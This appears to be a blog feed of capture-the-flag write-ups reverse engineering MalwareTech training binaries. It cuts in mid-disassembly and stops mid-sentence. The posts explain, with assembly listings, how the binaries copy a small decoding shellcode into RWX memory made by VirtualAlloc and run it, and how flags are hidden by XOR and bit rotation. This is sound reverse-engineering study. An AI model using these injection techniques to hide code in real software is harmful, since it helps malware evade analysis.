0x00404200 push ecx 0x00404201 call dword [ebp - 0x44] 0x00404204 mov dword [ebp - 0x90], eax </code></pre> <p>Here we are getting the address to fread as ebp 0x90.</p> <pre><code class="language-assembly"> 0x0040420a lea edx, [ebp - 0x60] 0x0040420d push edx 0x0040420e mov eax, dword [ebp - 0x3c] 0x00404211 push eax 0x00404212 call dword [ebp - 0x44] 0x00404215 mov dword [ebp - 0x64], eax </code></pre> <p>Here we are getting the address to fclose as ebp 0x64. Lets update these and go on to the next call.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle dword [ebp - 0x84] kernel32.dll module handle dword [ebp - 0x10] GetModuleFileNameA address dword [ebp - 0x80] fopen address dword [ebp - 0xa4] fseek address dword [ebp - 0x90] fread address dword [ebp - 0x64] fclose address </code></pre></div></div> <pre><code class="language-assembly"> 0x00404218 push 0x104 ; 260 0x0040421d lea ecx, [ebp - 0x1b0] 0x00404223 push ecx 0x00404224 push 0 0x00404226 call dword [ebp - 0x10] </code></pre> <p>Here we are calling GetModuleFileNameA(0, ebp 0x1b0, 260)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DWORD GetModuleFileNameA( HMODULE hModule, LPSTR lpFilename, DWORD nSize ); </code></pre></div></div> <p>We are sending an hModule of 0:</p> <blockquote> <p>A handle to the loaded module whose path is being requested. If this parameter is NULL, GetModuleFileName retrieves the path of the executable file of the current process.</p> </blockquote> <p>lpFilename is listed in the docs as follows</p> <blockquote> <p>A pointer to a buffer that receives the fully qualified path of the module. If the length of the path is less than the size that the nSize parameter specifies, the function succeeds and the path is returned as a null-terminated string.</p> </blockquote> <p>So ebp 0x1b0 is the fully qualified path to the running process.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle dword [ebp - 0x84] kernel32.dll module handle dword [ebp - 0x10] GetModuleFileNameA address dword [ebp - 0x80] fopen address dword [ebp - 0xa4] fseek address dword [ebp - 0x90] fread address dword [ebp - 0x64] fclose address dword [ebp - 0x1b0] current process path </code></pre></div></div> <pre><code class="language-assembly"> 0x00404229 lea edx, [ebp - 0x7c] 0x0040422c push edx 0x0040422d lea eax, [ebp - 0x1b0] 0x00404233 push eax 0x00404234 call dword [ebp - 0x80] 0x00404237 add esp, 8 0x0040423a mov dword [ebp - 0x40], eax 0x0040423d push 0 0x0040423f push 0x4e ; 'N' ; 78 0x00404241 mov ecx, dword [ebp - 0x40] 0x00404244 push ecx 0x00404245 call dword [ebp - 0xa4] 0x0040424b add esp, 0xc 0x0040424e mov edx, dword [ebp - 0x40] 0x00404251 push edx 0x00404252 push 1 ; 1 0x00404254 push 0x26 ; '&amp;' ; 38 0x00404256 lea eax, [ebp - 0x38] 0x00404259 push eax 0x0040425a call dword [ebp - 0x90] 0x00404260 add esp, 0x10 0x00404263 mov ecx, dword [ebp - 0x40] 0x00404266 push ecx 0x00404267 call dword [ebp - 0x64] </code></pre> <p>Now we are opening the current process to read only, as a binary file. We are then calling fseek(filestream,0x4e,0). Looking at the docs this means we have moved the pointer in the file to offset 0x4e. Next we are calling fread(ebp 0x38, 0x26, 1, filestream). The docs let us know that we are reading out 1 object that is 38 bytes. After this we are closing the filestream.</p> <p>Lets open the binary up in a hex editor and grab 38 bytes starting at 0x4e:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th| 00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno| 00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS | 00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |mode....$.......| </code></pre></div></div> <p>We get a string back from the header. “This program cannot be run in DOS mode.”</p> <pre><code class="language-assembly"> 0x0040426a add esp, 4 0x0040426d mov edx, dword [ebp + 8] ; [0x8:4]=-1 ; 8 0x00404270 mov ecx, dword [edx + 0xc] ; [0xc:4]=-1 ; 12 0x00404273 mov edi, dword [edx + 8] ; [0x8:4]=-1 ; 8 0x00404274 .string "z\b1\xd2\x8aD" ; len=7 ;-- "z\b1ҊD": : 0x0040427b enter 0x430, 0x17 ; 1072 : 0x0040427f inc edx : 0x00404280 cmp edx, ecx `=&lt; 0x00404282 jne 0x404278 0x00404284 mov esp, ebp 0x00404286 pop ebp 0x00404287 ret </code></pre> <p>It looks like we are moving our string to edx and the first 36 bytes to ecx. Something looks broken in this disassembly view, im not sure if I failed when importing it, or if radare2 just wasn’t able to handle it. Lets open Ghidra to take a look at the last few lines:</p> <pre><code class="language-assembly"> 0040426d 8b 55 08 MOV EDX,dword ptr [EBP + 0x8] 00404270 8b 4a 0c MOV ECX,dword ptr [EDX + 0xc] 00404273 8b 7a 08 MOV EDI,dword ptr [EDX + 0x8] 00404276 31 d2 XOR EDX,EDX </code></pre> <p>That is more of what I would expect. We are taking the header we read and XORing it with something. There was a stack string at the begining of the binary that I completely ignored. Lets grab it and see if thats what we need.</p> <pre><code class="language-assembly">| 0x00402284 mov byte [var_28h], 0x12 ; 18 | 0x00402288 mov byte [var_27h], 0x24 ; '$' ; 36 | 0x0040228c mov byte [var_26h], 0x28 ; '(' ; 40 | 0x00402290 mov byte [var_25h], 0x34 ; '4' ; 52 | 0x00402294 mov byte [var_24h], 0x5b ; '[' ; 91 | 0x00402298 mov byte [var_23h], 0x23 ; '#' ; 35 | 0x0040229c mov byte [var_22h], 0x26 ; '&amp;' ; 38 | 0x004022a0 mov byte [var_21h], 0x20 ; 32 | 0x004022a4 mov byte [var_20h], 0x35 ; '5' ; 53 | 0x004022a8 mov byte [var_1fh], 0x37 ; '7' ; 55 | 0x004022ac mov byte [var_1eh], 0x4c ; 'L' ; 76 | 0x004022b0 mov byte [var_1dh], 0x28 ; '(' ; 40 | 0x004022b4 mov byte [var_1ch], 0x76 ; 'v' ; 118 | 0x004022b8 mov byte [var_1bh], 0x26 ; '&amp;' ; 38 | 0x004022bc mov byte [var_1ah], 0x33 ; '3' ; 51 | 0x004022c0 mov byte [var_19h], 0x37 ; '7' ; 55 | 0x004022c4 mov byte [var_18h], 0x3a ; ':' ; 58 | 0x004022c8 mov byte [var_17h], 0x27 ; ''' ; 39 | 0x004022cc mov byte [var_16h], 0x3d ; '=' ; 61 | 0x004022d0 mov byte [var_15h], 0x6e ; 'n' ; 110 | 0x004022d4 mov byte [var_14h], 0x25 ; '%' ; 37 | 0x004022d8 mov byte [var_13h], 0x48 ; 'H' ; 72 | 0x004022dc mov byte [var_12h], 0x6f ; 'o' ; 111 | 0x004022e0 mov byte [var_11h], 0x3c ; '&lt;' ; 60 | 0x004022e4 mov byte [var_10h], 0x58 ; 'X' ; 88 | 0x004022e8 mov byte [var_fh], 0x3a ; ':' ; 58 | 0x004022ec mov byte [var_eh], 0x68 ; 'h' ; 104 | 0x004022f0 mov byte [var_dh], 0x2c ; ',' ; 44 | 0x004022f4 mov byte [var_ch], 0x43 ; 'C' ; 67 | 0x004022f8 mov byte [var_bh], 0x73 ; 's' ; 115 | 0x004022fc mov byte [var_ah], 0x10 ; 16 | 0x00402300 mov byte [var_9h], 0xe ; 14 | 0x00402304 mov byte [var_8h], 0x10 ; 16 | 0x00402308 mov byte [var_7h], 0x6b ; 'k' ; 107 | 0x0040230c mov byte [var_6h], 0x10 ; 16 | 0x00402310 mov byte [var_5h], 0x6f ; 'o' ; 111 </code></pre> <p>Now that we have this string lets grab the first 36 out of the header string We saw that ecx was being set to the first 36 bytes of the header string, and our xor key is 36 bytes so that should work out. Lets see if we can get our flag with Python:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="n">header</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x6d</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0x4f</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x6d</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">]</span> <span class="n">In</span> <span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="n">xorkey</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x12</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x34</span><span class="p">,</span> <span class="mh">0x5b</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0x4c</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x33</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0x3a</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x3d</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x25</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x3c</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0x3a</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="p">...:</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x0e</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x6b</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">]</span> <span class="n">In</span> <span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="n">flag</span> <span class="o">=</span> <span class="s">''</span> <span class="n">In</span> <span class="p">[</span><span class="mi">18</span><span class="p">]:</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">36</span><span class="p">):</span> <span class="p">...:</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="n">xorkey</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="p">...:</span> <span class="n">In</span> <span class="p">[</span><span class="mi">19</span><span class="p">]:</span> <span class="k">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span> <span class="n">FLAG</span><span class="p">{</span><span class="n">STORE</span><span class="o">-</span><span class="n">EVERYTHING</span><span class="o">-</span><span class="n">ON</span><span class="o">-</span><span class="n">THE</span><span class="o">-</span><span class="n">STACK</span><span class="p">}</span> </code></pre></div></div> <p>Flag 5 found. There are a few more challenges from MalwareTech, if I end up doing them I will be sure to post about it here. Other than that there are a few other CTF style reversing challenges I may look into. I also think its time to fire up the lab and document some actual malware reversing.</p> Mon, 24 Jun 2019 22:30:00 +0000 https://bizarrechaos.com/posts/MalwareTechChallenge_shellcode2.exe/ https://bizarrechaos.com/posts/MalwareTechChallenge_shellcode2.exe/ mtchallenge tools re posts MalwareTech Challenge - shellcode1.exe <p>I have been teaching myself to reverse engineer binary programs so that I can use these skills to reverse engineer malware. I have been learning assembly code, and playing with new tools such as ghidra and radare2/cutter.</p> <p>I found that <a href="https://twitter.com/MalwareTechBlog">@MalwareTech</a> had some great binary analysis challenges on his blog and decided to check them out.</p> <p>This write up covers the fourth challenge shellcode1.exe: <a href="https://www.malwaretech.com/challenges-shellcode1">‘https://www.malwaretech.com/challenges-shellcode1’</a></p> <p>Lets open this binary in cutter and analyze it with radare2. Once open lets navigate to the entry function:</p> <p><img src="https://bizarrechaos.com/attachments/shellcode1-cutter.png" alt="" /></p> <p>The first bit of intresting code we come across is:</p> <pre><code class="language-assembly">| 0x00402285 push 0x10 ; 16 | 0x00402287 push 0 ; DWORD dwFlags | 0x00402289 call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; 0x403008 ; HANDLE GetProcessHeap(void) | 0x0040228f push eax ; HANDLE hHeap | 0x00402290 call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; 0x403004 ; LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes) | 0x00402296 mov dword [var_4h], eax | 0x00402299 mov eax, dword [var_4h] | 0x0040229c mov dword [eax], str.2b__:__B_bb ; [0x404040:4]=0x3a0a6232 ; "2b\n:\u06daB*bb\x1az\"*iJ\x9ar\xa2iR\xaa\x9a\xa2i2z\x92i*\u0082bzJ\xa2\x9a\xeb" | 0x004022a2 push str.2b__:__B_bb ; 0x404040 ; "2b\n:\u06daB*bb\x1az\"*iJ\x9ar\xa2iR\xaa\x9a\xa2i2z\x92i*\u0082bzJ\xa2\x9a\xeb" ; const char *s </code></pre> <p>0x00402285 is pushing 16 to the stack. 0x00402287 is pushing 0 to the stack. 0x00402289 is a call to <a href="https://docs.microsoft.com/en-us/windows/desktop/api/heapapi/nf-heapapi-getprocessheap">GetProcessHeap</a></p> <blockquote> <p>Retrieves a handle to the default heap of the calling process. This handle can then be used in subsequent calls to the heap functions.</p> </blockquote> <p>0x0040228f is pushing a handle to our current heap to the stack.</p> <p>Currently our stack is as follows:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Heap 0 16 </code></pre></div></div> <p>0x00402290 is a call to <a href="https://docs.microsoft.com/en-us/windows/desktop/api/heapapi/nf-heapapi-heapalloc">HeapAlloc</a></p> <blockquote> <p>Allocates a block of memory from a heap. The allocated memory is not movable.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DECLSPEC_ALLOCATOR</span> <span class="n">LPVOID</span> <span class="nf">HeapAlloc</span><span class="p">(</span> <span class="n">HANDLE</span> <span class="n">hHeap</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">dwFlags</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="n">dwBytes</span> <span class="p">);</span> </code></pre></div></div> <p>This call is returning a pointer to allocated memory. Specifically a 16 byte section of the heap.</p> <p>After accepting our pointer we are then pushing a string from offset 0x404040 to the stack:</p> <pre><code class="language-assembly">| 0x0040229c mov dword [eax], str.2b__:__B_bb ; [0x404040:4]=0x3a0a6232 ; "2b\n:\u06daB*bb\x1az\"*iJ\x9ar\xa2iR\xaa\x9a\xa2i2z\x92i*\u0082bzJ\xa2\x9a\xeb" | 0x004022a2 push str.2b__:__B_bb ; 0x404040 ; "2b\n:\u06daB*bb\x1az\"*iJ\x9ar\xa2iR\xaa\x9a\xa2i2z\x92i*\u0082bzJ\xa2\x9a\xeb" ; const char *s </code></pre> <p>Using the comment generated by radare2 we know our string starts at 0x404040 and the last byte is EB. Lets go look at 0x404040 in the hexdump view and grab those bytes:</p> <p><img src="https://bizarrechaos.com/attachments/shellcode1-cutter-hexdump.png" alt="" /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>32 62 0a 3a db 9a 42 2a 62 62 1a 7a 22 2a 69 4a 9a 72 a2 69 52 aa 9a a2 69 32 7a 92 69 2a c2 82 62 7a 4a a2 9a eb </code></pre></div></div> <p>The next few lines of assembly calls strlen which would get the length of the dword we just pushed to the stack:</p> <pre><code class="language-assembly">| 0x004022a7 call sub.ntdll.dll_strlen ; size_t strlen(const char *s) | 0x004022ac add esp, 4 | 0x004022af mov ecx, dword [var_4h] | 0x004022b2 mov dword [ecx + 4], eax </code></pre> <p>It looks like we are saving this string for later use as var_4h lets move on:</p> <pre><code class="language-assembly">| 0x004022b5 push 0x40 ; '@' ; 64 ; DWORD flProtect | 0x004022b7 push 0x1000 ; DWORD flAllocationType | 0x004022bc push 0xd ; 13 ; SIZE_T dwSize | 0x004022be push 0 ; LPVOID lpAddress | 0x004022c0 call dword [sym.imp.KERNEL32.dll_VirtualAlloc] ; 0x403000 ; LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) | 0x004022c6 mov dword [s1], eax </code></pre> <p>At 0x004022c0 we are calling <a href="https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualalloc">VirtualAlloc(0, 13, 0x1000, 0x40)</a></p> <blockquote> <p>Reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. Memory allocated by this function is automatically initialized to zero.</p> </blockquote> <p>Lets go over what the parameters we are sending mean.</p> <ul> <li>0 is the starting address of the region to allocate.</li> <li>13 is the region size in bytes.</li> <li>0x1000 translates to <code class="language-plaintext highlighter-rouge">MEM_COMMIT</code>:</li> </ul> <blockquote> <p>Allocates memory charges (from the overall size of memory and the paging files on disk) for the specified reserved memory pages. The function also guarantees that when the caller later initially accesses the memory, the contents will be zero. Actual physical pages are not allocated unless/until the virtual addresses are actually accessed. To reserve and commit pages in one step, call VirtualAlloc with MEM_COMMIT | MEM_RESERVE. Attempting to commit a specific address range by specifying MEM_COMMIT without MEM_RESERVE and a non-NULL lpAddress fails unless the entire range has already been reserved. The resulting error code is ERROR_INVALID_ADDRESS. An attempt to commit a page that is already committed does not cause the function to fail. This means that you can commit pages without first determining the current commitment state of each page. If lpAddress specifies an address within an enclave, flAllocationType must be MEM_COMMIT.</p> </blockquote> <ul> <li>0x40 translates to <code class="language-plaintext highlighter-rouge">PAGE_EXECUTE_READWRITE</code>.</li> </ul> <blockquote> <p>Enables execute, read-only, or read/write access to the committed region of pages.</p> </blockquote> <p>The return value, the base memory address, is saved as a dword.</p> <p>Now we have an address to a 13 byte section of page memory with RWX.</p> <p>Moving forward it looks like we are setting up the stack to call <a href="https://www.geeksforgeeks.org/write-memcpy/">memcpy(address to our 13 byte page memory, 0x404068, 13)</a></p> <pre><code class="language-assembly">| 0x004022cc push 0xd ; 13 ; size_t n | 0x004022ce push 0x404068 ; 'h@@' ; const void *s2 | 0x004022d3 mov edx, dword [s1] | 0x004022d9 push edx ; void *s1 | 0x004022da call sub.ntdll.dll_memcpy ; void *memcpy(void *s1, const void *s2, size_t n) | 0x004022df add esp, 0xc | 0x004022e2 mov esi, dword [var_4h] | 0x004022e5 call dword [s1] </code></pre> <p>So we are copying 13 bytes from 0x404068 to page memory. Then we are moving the string from earlier to esi. 0x004022e5 is a call to si which is the memory address that we have copied to. Lets take a look at whats at 0x404068:</p> <pre><code class="language-assembly">| 0x00404068 mov edi, dword [esi] | 0x0040406a mov ecx, dword [esi + 4] ; [0x4:4]=-1 ; 4 | .-&gt; 0x0040406d rol byte [edi + ecx - 1], 5 | `=&lt; 0x00404072 loop 0x40406d | 0x00404074 ret </code></pre> <p>This appears to be our shellcode and we are injecting it into page memory. The call in 0x004022e5 runs this code.</p> <p>Right away we see that we are moving esi to edi.</p> <p>We are then setting up a counter, which relates back to the strlen call we saw earlier. This is likely our way of iterating over the string so to speak.</p> <p>We then see:</p> <pre><code class="language-assembly">| .-&gt; 0x0040406d rol byte [edi + ecx - 1], 5 | `=&lt; 0x00404072 loop 0x40406d | 0x00404074 ret </code></pre> <p>So it appears our shellcode is taking our string (byte array) from earlier and rotating the bits left 5 and then returning the new string, which I can only assume is our flag.</p> <p>Normally I would grab the hex throw it in a Python list and iterate through it, however Python does not contain a native rotate function.</p> <p>Instead of grabbinbg one off Github or writing one myself, lets use another tool that I find very useful when working with data conversions: <a href="https://gchq.github.io/CyberChef">CyberChef</a></p> <p><img src="https://bizarrechaos.com/attachments/shellcode1-cyberchef.png" alt="" /></p> <p>And just like that we have our flag.</p> <p>The rest of the assembly is what we have become familiar with in these challenges. When ran the program prints the MD5 value of the flag and pops a messagebox saying “We’ve been compromised!”</p> <p>I learned a lot from this challenge. This is all new to me so going in getting my hands dirty has been great. We found a “string” that wasnt readable. We found byte code that we then injected into memory. And we were able to replicate the byte code and sucessfully translate our string into a readable flag.</p> <p>10/10 will upload again.</p> Sun, 23 Jun 2019 22:15:00 +0000 https://bizarrechaos.com/posts/MalwareTechChallenge_shellcode1.exe/ https://bizarrechaos.com/posts/MalwareTechChallenge_shellcode1.exe/ mtchallenge tools re posts MalwareTech Challenge - strings3.exe <p>I have been teaching myself to reverse engineer binary programs so that I can use these skills to reverse engineer malware. I have been learning assembly code, and playing with new tools such as ghidra and radare2/cutter.</p> <p>I found that <a href="https://twitter.com/MalwareTechBlog">@MalwareTech</a> had some great binary analysis challenges on his blog and decided to check them out.</p> <p>This write up covers the third challenge strings3.exe: <a href="https://www.malwaretech.com/strings3">‘https://www.malwaretech.com/strings3’</a></p> <p>Lets open this binary in cutter and analyze it with radare2. Once open lets navigate to the entry fucntion:</p> <p><img src="https://bizarrechaos.com/attachments/strings3-cutter.png" alt="" /></p> <p>Already this challenge looks a bit more challenging than the previous ones. Lets take a look at the assembly:</p> <pre><code class="language-assembly">/ (fcn) entry0 179 | entry0 (); | ; var LPSTR lpBuffer @ ebp-0x4a0 | ; var void *s @ ebp-0x49f | ; var LPCSTR lpText @ ebp-0x9c | ; var int32_t var_98h @ ebp-0x98 | ; var HRSRC var_8h @ ebp-0x8 | ; var UINT uID @ ebp-0x4 | 0x00402290 push ebp | 0x00402291 mov ebp, esp | 0x00402293 sub esp, 0x4a0 | 0x00402299 lea ecx, [var_98h] | 0x0040229f call sym.plaintext3.exe___0MD5__QAE_XZ | 0x004022a4 mov byte [lpBuffer], 0 | 0x004022ab push 0x3ff ; 1023 ; size_t n | 0x004022b0 push 0 ; int c | 0x004022b2 lea eax, [s] | 0x004022b8 push eax ; void *s | 0x004022b9 call sub.ntdll.dll_memset ; void *memset(void *s, int c, size_t n) | 0x004022be add esp, 0xc | 0x004022c1 mov dword [uID], 0 | 0x004022c8 push 6 ; 6 ; LPCSTR lpType | 0x004022ca push str.rc.rc ; 0x403028 ; "rc.rc" ; LPCSTR lpName | 0x004022cf push 0 ; HMODULE hModule | 0x004022d1 call dword [sym.imp.KERNEL32.dll_FindResourceA] ; 0x403000 ; HRSRC FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType) | 0x004022d7 mov dword [var_8h], eax | 0x004022da mov eax, 1 | 0x004022df shl eax, 8 | 0x004022e2 xor edx, edx | 0x004022e4 inc edx | 0x004022e5 shl edx, 4 | 0x004022e8 or eax, edx | 0x004022ea mov dword [uID], eax | 0x004022ed push 0x3ff ; 1023 ; int cchBufferMax | 0x004022f2 lea ecx, [lpBuffer] | 0x004022f8 push ecx ; LPSTR lpBuffer | 0x004022f9 mov edx, dword [uID] | 0x004022fc push edx ; UINT uID | 0x004022fd push 0 ; HINSTANCE hInstance | 0x004022ff call dword [sym.imp.USER32.dll_LoadStringA] ; 0x40300c ; "*1" ; int LoadStringA(HINSTANCE hInstance, UINT uID, LPSTR lpBuffer, int cchBufferMax) | 0x00402305 lea eax, [lpBuffer] | 0x0040230b push eax | 0x0040230c lea ecx, [var_98h] | 0x00402312 call sym.plaintext3.exe__digestString_MD5__QAEPADPAD_Z | 0x00402317 mov dword [lpText], eax | 0x0040231d push 0x30 ; '0' ; 48 ; UINT uType | 0x0040231f push str.We_ve_been_compromised ; 0x403030 ; "We've been compromised!" ; LPCSTR lpCaption | 0x00402324 mov ecx, dword [lpText] | 0x0040232a push ecx ; LPCSTR lpText | 0x0040232b push 0 ; HWND hWnd | 0x0040232d call dword [sym.imp.USER32.dll_MessageBoxA] ; 0x403010 ; int MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) | 0x00402333 push 0 ; UINT uExitCode | 0x00402335 call dword [sym.imp.KERNEL32.dll_ExitProcess] ; 0x403004 ; void ExitProcess(UINT uExitCode) | 0x0040233b xor eax, eax | 0x0040233d mov esp, ebp | 0x0040233f pop ebp \ 0x00402340 ret 0x10 </code></pre> <p>Here we see several variables being referenced then stack being initialized. After this we are loding in the addresses of the functions we will be calling. Looking through the next couple of lines we come across:</p> <pre><code class="language-assembly">| 0x004022c1 mov dword [uID], 0 | 0x004022c8 push 6 ; 6 ; LPCSTR lpType | 0x004022ca push str.rc.rc ; 0x403028 ; "rc.rc" ; LPCSTR lpName | 0x004022cf push 0 ; HMODULE hModule | 0x004022d1 call dword [sym.imp.KERNEL32.dll_FindResourceA] ; 0x403000 ; HRSRC FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType) | 0x004022d7 mov dword [var_8h], eax </code></pre> <p>So it looks like we are setting up a pointer to store the output of a function call. The function we are calling is <code class="language-plaintext highlighter-rouge">FindResourceA</code>. Now based on the name we can assume what this does but since i have no idea what I am doing lets do a quick google search. The first result was a <a href="https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-findresourcea">‘Microsoft Docs page’</a>.</p> <p><img src="https://bizarrechaos.com/attachments/MSDocsFindResourceA.png" alt="" /></p> <p><code class="language-plaintext highlighter-rouge">Determines the location of a resource with the specified type and name in the specified module.</code> So our end result will be an address to a resource stored in var_8h.</p> <p>Further down we come across another function call:</p> <pre><code class="language-assembly">| 0x004022ea mov dword [uID], eax | 0x004022ed push 0x3ff ; 1023 ; int cchBufferMax | 0x004022f2 lea ecx, [lpBuffer] | 0x004022f8 push ecx ; LPSTR lpBuffer | 0x004022f9 mov edx, dword [uID] | 0x004022fc push edx ; UINT uID | 0x004022fd push 0 ; HINSTANCE hInstance | 0x004022ff call dword [sym.imp.USER32.dll_LoadStringA] ; 0x40300c ; "*1" ; int LoadStringA(HINSTANCE hInstance, UINT uID, LPSTR lpBuffer, int cchBufferMax) | 0x00402305 lea eax, [lpBuffer] </code></pre> <p>Lets figure out what <a href="https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-loadstringa">‘LoadStringA’</a> does exactly.</p> <p><img src="https://bizarrechaos.com/attachments/MSDocsLoadStringA.png" alt="" /></p> <p><code class="language-plaintext highlighter-rouge">Loads a string resource from the executable file associated with a specified module and either copies the string into a buffer with a terminating null character or returns a read-only pointer to the string resource itself.</code></p> <p>The rest of the entry function looks like what we have seen in the past challenges.</p> <p>So it looks like our flag is in lpBuffer. Now we just need to figure out how to take a look at that. Looking at the docs the second argument given to LoadStringA is <code class="language-plaintext highlighter-rouge">The identifier of the string to be loaded.</code> which in our code is here <code class="language-plaintext highlighter-rouge">0x004022ea mov dword [uID], eax</code>. So we need to know what resource to look at then we could use the string identifier to find our flag. Looking at just the assembly here there are a few lines here that stand out to me. eax is set to a value that is then moved to uID. Lets do some quick math.</p> <pre><code class="language-assembly">| 0x004022da mov eax, 1 ; eax = 1 | 0x004022df shl eax, 8 ; eax = 1 &lt;&lt; 8 = 256 = 0x100 | 0x004022e2 xor edx, edx ; clears out edx for use | 0x004022e4 inc edx ; edx = 1 | 0x004022e5 shl edx, 4 ; edx = 1 &lt;&lt; 4 = 16 = 0x10 | 0x004022e8 or eax, edx ; eax = 256 | 16 = 272 = 0x110 </code></pre> <p>So it looks like the string identifier is 272 (0x110). Lets see if we can find it.</p> <p>Popping open the resources it doesnt look like we have a 272, or rather radare2 wasnt able to parse all the resource strings properly:</p> <p><img src="https://bizarrechaos.com/attachments/strings3-cutter-resources.png" alt="" /></p> <p>Lets open this up and see what ghidra shows us. Once pulling up the entry function i started editing the function signature and some of the variable names to reflect what we already know:</p> <p><img src="https://bizarrechaos.com/attachments/strings3-ghidra.png" alt="" /></p> <p>Well look at that, 